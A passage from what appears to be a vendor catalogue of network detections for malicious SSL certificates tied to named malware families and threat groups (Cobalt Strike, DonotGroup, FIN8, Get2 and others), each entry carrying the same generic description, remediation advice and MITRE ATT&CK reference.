This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Cobalt Strike CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (CobaltStrike CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Observed Malicious SSL Cert (CobaltStrike CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (CobaltStrike CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (CobaltStrike CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (CobaltStrike CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (CobaltStrike CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (CobaltStrike CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (CobaltStrike CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (CobaltStrike CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (CobaltStrike CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (CobaltStrike CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (CobaltStrike CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (CobaltStrike CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (CobaltStrike CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (CobaltStrike CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Cobalt Strike Malleable C2 Domain)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (CobInt CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (ColdRiver APT DNSpionage MITM)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (ColdRiver APT DNSpionage MITM)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (ColdRiver APT DNSpionage MITM)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (ColdRiver APT DNSpionage MITM)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (ColdRiver APT DNSpionage MITM)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (CONFUCIOUS_B CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (CopperStealer CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (CopperStealer CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (CoreBot C2)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (CoreDn/BLINDINGCAN Activity)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (CryptoMimic Staging CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Malicious SSL Cert (CryptoMimic Staging CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Malicious SSL Cert (DeadlyKiss APT)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Donot Group/APT-C-35 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (DonotGroup CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (DonotGroup CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (DonotGroup CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (DonotGroup CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (DonotGroup CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (DonotGroup CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (DonotGroup CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (DonotGroup CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (DonotGroup CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (DonotGroup CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (DonotGroup CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (DonotGroup CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (DonotGroup CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (DonotGroup CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (DonotGroup FireStarter CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (DonotGroup FireStarter CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (DonotGroup FireStarter CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (DonotGroup FireStarter CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (DonotGroup/Patchwork CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (DonotGroup Stage 2 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (ElegyRAT)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (ELF/Rekoobe CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Fake Gmail Self Signed - Possible Cobalt Stirke)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (FIN7/GRIFFON CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (FIN7/JSSLoader CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (FIN8 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Malicious SSL Cert (FIN8 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Malicious SSL Cert (FIN8 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Malicious SSL Cert (FIN8 ShellTea CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (FIN8 ShellTea CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (FIN8 Staging CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Malicious SSL Cert (Fullz House CC Skimmer)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Fullz House CC Skimmer)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Fullz House CC Skimmer)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Fullz House CC Skimmer)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Fullz House CC Skimmer)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Fullz House CC Skimmer)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Fullz House CC Skimmer)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Fullz House CC Skimmer)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Fullz House CC Skimmer)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Fullz House CC Skimmer)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Fullz House CC Skimmer)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Fullz House CC Skimmer)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Fullz House CC Skimmer)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Gelsemium CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Get2 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Get2 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Get2 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Get2 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Get2 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Get2 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Get2 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Get2 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (Get2 CnC)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

